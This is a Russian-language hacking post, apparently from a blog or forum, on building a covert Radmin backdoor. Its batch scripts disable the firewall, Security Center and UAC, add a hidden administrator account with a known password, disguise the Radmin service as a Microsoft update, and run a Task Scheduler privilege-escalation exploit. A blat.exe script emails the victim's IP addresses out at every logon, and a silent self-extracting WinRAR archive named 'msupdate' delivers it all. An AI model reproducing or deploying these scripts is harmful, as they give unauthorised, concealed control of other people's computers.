Рубрики
kali \ virus \ rootkit \ вирусы \ защита

Radmin настройка / установка / удаление / winrar / blat.exe / ip.exe

Ссылки:

https://www.radmin.ru/download/
http://xaker.name/threads/19398/
https://technet.microsoft.com/library/hh528537.aspx?f=255&MSPPError=-2147217396
https://www.itninja.com/community/appdeploy-repackager

ПО:

пакет утилит Radmin Deployment tool
msi пакет сервера Radmin
программа Bat to Exe Converter
архиватор WinRar
для отправки email blat.exe
сплойт Windows Task Scheduler Privilege Escalation

Ветки реестра radmin 2.x

Основные: 
спрашивать пользователя
спрятать иконку
включить/выключить логи
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser] "00 00 00 00"
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon] "00 00 00 00" 
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile] "00 00 00 00"
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled] "00 00 00 00" 
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisallowChanges] "01 00 00 00"
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableBeep] "01 00 00 00" 


Остальные:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile]
Включить протоколирование. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (включить) и "00 00 00 00" (отключить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath]
Путь до файла протокола. Тип параметра - строковый (string) (полный путь до лог-файла).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter]
Пароль Radmin Server (модифицированный так, что восстановить по нему исходный пароль невозможно).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port]
Номер порта. 
Тип параметра - двоичный (binary) (десятичный номер порта, переведённый в шестнадцатеричный формат).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled]
Включить NT Security. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (включить) и "00 00 00 00" (отключить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers\]
Список пользователей для NT Security.

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType\Data]
Лицензионный ключ (модифицированный так, что восстановить по нему исходный ключ невозможно).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisallowChanges]
Запретить изменение настроек Radmin Server. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) и "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableBeep]
Отключить звуковой сигнал при подключении. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (отключить) and "00 00 00 00" (включить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableRedirect]
Заблокировать подключения в режиме Переадресация (Redirect) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableScreen]
Заблокировать подключения в режиме Полный контроль (Full control) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableView]
Заблокировать подключения в режиме Только просмотр (View Only) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTelnet]
Заблокировать подключения в режиме Телнет (Telnet) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableFile]
Заблокировать подключения в режиме Обмен файлами (File Transfer) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

Сетевая деинсталляция:

Чтобы удалить Radmin Server, выполните следующее:
1. c:\winnt\system32\r_server.exe /stop
2. c:\winnt\system32\r_server.exe /unregister
3. c:\winnt\system32\r_server.exe /uninstall /silence
4. Удалите все файлы Radmin

Батник для установки 2.x (1.bat)

@echo off
"%WINDIR%\system32\r_server.exe" /install /silence 
"%WINDIR%\system32\r_server.exe" /port:4899
"%WINDIR%\system32\r_server.exe" /pass:123456
"%WINDIR%\system32\r_server.exe" /save
REGEDIT /S "%WINDIR%\system32\2.reg"
Exit

Файл реестра 2.x (2.reg)

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:01,00,00,00
"Parameter"=hex:85,1d,e1,8c,05,df,44,42,4f,38,85,e8,61,b4,76,34
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\radmin.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:01,00,00,00
"DisableBeep"=hex:01,00,00,00
"DisallowChanges"=hex:00,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Port"=hex:23,02,00,00

Файлы необходимые для работы radmin 2.x (Copy of system32)

AdmDll.dll
r_server.exe
raddrv.dll

Radmin Deployment tool программа для настройки msi Radmin 3.x

Устанавливаем Radmin Deployment tool
После установки запускаем Radmin MSI Configurator
Указываем ему на скачанный msi пакет сервера Radmin
Задаём настройки, добавляем пользователя и сохраняем

Пример батника для установки radmin 3.x с доп нагрузкой ip.exe

@echo off
net stop Alerter
sc config Alerter start= disabled
net stop wscsvc
sc config wscsvc start= disabled
net stop 
sc config SharedAccess start= disabled


%TEMP%\msupdate.msi /qn /norestart

@ ping -n 10 127.0.0.1

rmdir "%USERPROFILE%\Главное меню\Программы\Radmin Server 3" /Q /S
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}" /f
reg delete "HKCU\Software\Microsoft\Installer\Features\78C4C8A3064DA8840AAA98396F3D551B" /f
reg delete "HKCU\Software\Microsoft\Installer\Products\78C4C8A3064DA8840AAA98396F3D551B" /f

attrib +S +H %windir%\system32\rserver30

net stop rserver3
reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "DisplayName" /d "Microsoft Update Provide" /f
reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
net start rserver3

netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow
netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow
schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/ip.exe

at 15:00 cmd /c del %Temp%\*.* /Q /S /F

blat — почтовый клиент

blat.exe -install -server smtp.yandex.ru -port 25 -f iprdm@yandex.ru -u iprdm -pw 123456
smtp.yandex.ru - smtp адрес вашего почтового сервера, указываем свой
-port 25 - smtp порт, скорее всего, у вас такой же
iprdm@yandex.ru - ваш почтовый ящик, указываем свой
-u iprdm - логин почтового ящика, пишем свой
-pw 123456 - пароль почтового ящика, соответственно, указываем свой

батник отправка ip с помощью blat.exe

@echo off

ipconfig /all > localip.txt
realip.exe > realip.txt

ping -n 5 127.0.0.1 > nul

blat.exe -install -server smtp.yandex.ru -port 25 -f login@ya.ru -u login -pw pass
blat.exe -to login@ya.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
blat.exe -to login@ya.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"

del /f /q localip.txt
del /f /q realip.txt

Собираем blat.exe с нагрузкой ip.exe

запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory.
Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. 
Затем жмём Compile и получаем файл ip.exe

сценарий для установки radmin 3.x + ip.exe(blat.exe+io.cmd)

Цитата:
@echo off

if exist c:\users\nul (goto win7) else goto winxp

:win7
ping -n 3 127.0.0.1
start %temp%\poc.exe
ping -n 3 127.0.0.1
goto install

:winxp
net stop Alerter
sc config Alerter start= disabled
net stop wscsvc
sc config wscsvc start= disabled
net stop SharedAccess
sc config SharedAccess start= disabled
sc config TlntSvr start= auto
net start TlntSvr

:install
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f

net user HelpAssistant admin /add
net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
net user HelpAssistant admin

%temp%\msupdate.msi /qn /norestart

start %temp%\ip.exe

ping -n 5 127.0.0.1

attrib +S +H %windir%\system32\rserver30

schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %temp%\ip.exe

net stop rserver3
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
net start rserver3

@rem (c) special 4 xaker.name by Iindigo
Тоже самое, но с комментариями:

Цитата:
@rem отключаем вывод консольного окна
@echo off

@rem проверяем какая система установлена на компьютере
if exist c:\users\nul (goto win7) else goto winxp

@rem если windows vista/7, то запускаем сплойт и перемещаемся к маркеру install
:win7
ping -n 3 127.0.0.1
start %temp%\poc.exe
ping -n 3 127.0.0.1
goto install

@rem если windows xp, то останавливаем и отключаем службы "Оповещатель", "Центр обеспечения безопасности" и "Брандмауэр Windows", включаем и стартуем службу "Telnet"
:winxp
net stop Alerter
sc config Alerter start= disabled
net stop wscsvc
sc config wscsvc start= disabled
net stop SharedAccess
sc config SharedAccess start= disabled
sc config TlntSvr start= auto
net start TlntSvr

@rem отключаем UAC (будет выключен после перезагрузки) и добавляем системную учётку HelpAssistant
:install
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f

@rem непосредственно добавляем пользователя HelpAssistant, добавляем в группу Администраторы, даём пароль admin
net user HelpAssistant admin /add
net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
net user HelpAssistant admin

@rem запускаем скрытую установку нашего msi пакета
%temp%\msupdate.msi /qn /norestart

@rem запускаем скрипт отправки IP на наш почтовый адрес
start %temp%\ip.exe

@rem немного ждём, пока стартует служба и гарантированно завершится установка msi пакета
ping -n 5 127.0.0.1

@rem устанавливаем аттрибуты "системный" и "скрытый" для папки с установленным сервером
attrib +S +H %windir%\system32\rserver30

@rem добавляем задачу "при входе в винду отправлять IP на email"
schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %temp%\ip.exe

@rem останавливаем службу радмина, переименовываем и опять стартуем (окончательное переименование произойдёт после перезагрузки)
net stop rserver3
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f
reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
net start rserver3

Winrar или как нам теперь собрать все в кучу с авто установкой да с нагрузкой.

Пример есть: 
msupdate.msi - специальный пакет radmin server 3.4
ip.exe - программа которая возьмёт ip компьютера и отправит нам их на мыло
inst.exe - основной инсталлятор
poc.exe - сплойт Windows Task Scheduler Privilege Escalation

Ставим архиватор WinRar. 
Затем, выделяем файлы и создаем архив. 
Даём архиву название, к примеру msupdate. 
В настройках архива ставим галочки напротив "Создать "SFX-архив" и "Протестировать файлы после упаковки". 
Уровень сжатия ставим максимальный. Далее переходим на вкладку "Дополнительно" и открываем "Параметры SFX".

Вкладка "Общие":
Путь для распаковки - вводим %temp%
Выполнить после распаковки - вводим %temp%\inst.exe

Вкладка "Режимы":
Режим вывода информации - ставим в "Скрыть всё"

Вкладка "Обновление":
Режим перезаписи - ставим в "Перезаписывать все файлы без запроса"
Жмём "Ок" и ещё раз "Ок" для создания архива.
Инсталлятор готов.